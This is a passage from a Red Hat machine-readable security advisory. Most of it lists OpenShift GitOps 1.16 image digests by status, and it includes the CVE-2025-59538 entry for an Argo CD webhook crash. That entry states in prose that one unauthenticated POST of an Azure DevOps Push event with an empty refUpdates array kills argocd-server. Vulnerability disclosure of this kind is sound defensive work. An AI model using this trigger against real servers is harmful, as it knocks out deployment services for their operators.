"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service"
},
{
"cve": "CVE-2025-59538",
"cwe": {
"id": "CWE-703",
"name": "Improper Check or Handling of Exceptional Conditions"
},
"discovery_date": "2025-10-01T22:00:57.544949+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400940"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "RHBZ#2400940",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400940"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59538",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59538"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf",
"url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
}
],
"release_date": "2025-10-01T21:09:08.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
